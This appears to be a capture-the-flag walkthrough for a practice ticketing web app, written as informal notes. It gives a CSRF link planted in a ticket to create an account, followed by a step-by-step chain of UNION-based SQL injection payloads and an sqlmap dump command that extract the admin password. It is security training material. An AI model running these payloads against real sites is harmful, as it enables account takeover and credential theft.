Tickettastic Demo & Live instance

Flag 0

• Review the demo, and take notes how this is all setup.
• View the live now.
• demo and live look exactly the same in the code wise.
• Admin Login -> attempt admin / admin but shouldn’t work.
• Jump to submit a ticket  and add in this information to inject some code and see if it works
• <a href=”http://localhost/newUser?username=test&password=test&password2=test”>TEST</a>
• Now login with the new account
• Read the Flag wont work.
• Flag 0 found

Flag 1

• use burp suite to find the request, we will focus on ticket?id=1 and dumping the admin login creds.
• ticket?id=1′ -> shows that it is running mysql database but we got an error message, lets run down a quick list.
• Lets try this one, ticket?id=1 AND 1=1 *this one works* no flag tho, but ticket?id=1 AND 1=2 does not.
• Lets see if we can find the table numbers.  ticket?id=1 AND 1=1 ORDER BY 10, does not work but ticket?id=1 AND 1=1 ORDER BY 3 does. ticket?id=1 AND 1=1 ORDER BY 4 error out. Sooo lets union select.
• ticket?id=1.1 UNION SELECT 1,2,3– shows the 1,2, our rreply, 3
• Lets do some fun, lets see if we can drop a version of the database
• ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3–
• now lets get a table name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()–
• This should show 2 tables, one we want “users”
• Lets drop the column_name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=’users’–
• This will drop the id, username, password.  Oh we are close to admin now!
• ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username=’admin’–
• Flag 1 found
• I just learned something, we could of just have done this. the easier way.
• Burp suite > read the GET post, save that to a file and use sqlmap -r therequest.txt –dump